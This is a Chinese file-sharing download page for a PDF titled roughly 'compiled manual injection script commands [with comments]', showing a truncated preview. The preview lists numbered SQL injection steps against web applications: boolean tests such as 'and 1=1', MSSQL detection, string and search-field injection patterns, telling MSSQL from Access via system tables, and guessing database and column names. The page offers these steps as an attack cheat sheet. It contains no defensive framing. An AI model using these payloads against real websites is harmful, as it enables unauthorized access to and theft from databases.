1. 首页
  2. 数据库
  3. 其它
  4. 整理了下手动注入脚本命令[带注释]

整理了下手动注入脚本命令[带注释]

上传者: 2021-01-17 04:45:23上传 PDF文件 39.64KB 热度 8次
1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) fr
用户评论